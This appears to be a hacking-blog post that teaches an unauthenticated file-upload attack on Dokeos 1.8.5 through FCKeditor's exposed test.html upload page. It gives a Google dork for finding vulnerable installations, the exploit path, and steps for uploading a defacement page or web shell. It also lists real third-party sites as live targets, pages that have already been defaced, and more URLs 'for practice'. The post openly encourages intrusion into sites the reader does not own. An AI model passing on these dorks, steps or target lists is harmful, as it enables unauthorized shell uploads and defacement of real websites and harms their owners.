Menu
 

Hello Friends i have decided to put more tutorial on web vulnerabilities so thought of posting some cool upload shell and defacing web vulnerabilities.
web vulnerability and exploit
So lets get started...

Using this vulnerability hacker can upload shell or webpage without knowing user name or password.

To do this you need two things :

1st:

Google Dork : "Portail Dokeos 1.8.5"
(search for the string that is inside double quotes that we call a google dork)

2nd:

Exploit : http://websitename/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

(Its usually a url that hacker put to run his shell/you can say here uploading webpage)


Things that you need to do

Goto : http://websitename/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
change asp into PHP like FCK editor and Upload you deface shell or file, You can upload, .html .php .jpg .txt formats here To view your uploaded file go here : http://websitename/patch/main/upload/your file here

Live Demo :


http://www.kifofy.fr/kcours/main//inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Output results :

http://www.kifofy.fr/kcours/main/upload/darksite.co.in.html
http://www.formation-microkine.fr/main/upload/darksite.co.in.html

More such url for practice:

http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Good Luck Hcakers Stay awake for many such tutorials :)

Post a Comment

Post a Comment

Feel Free To Ask Your Query we Love To Answer

 
Top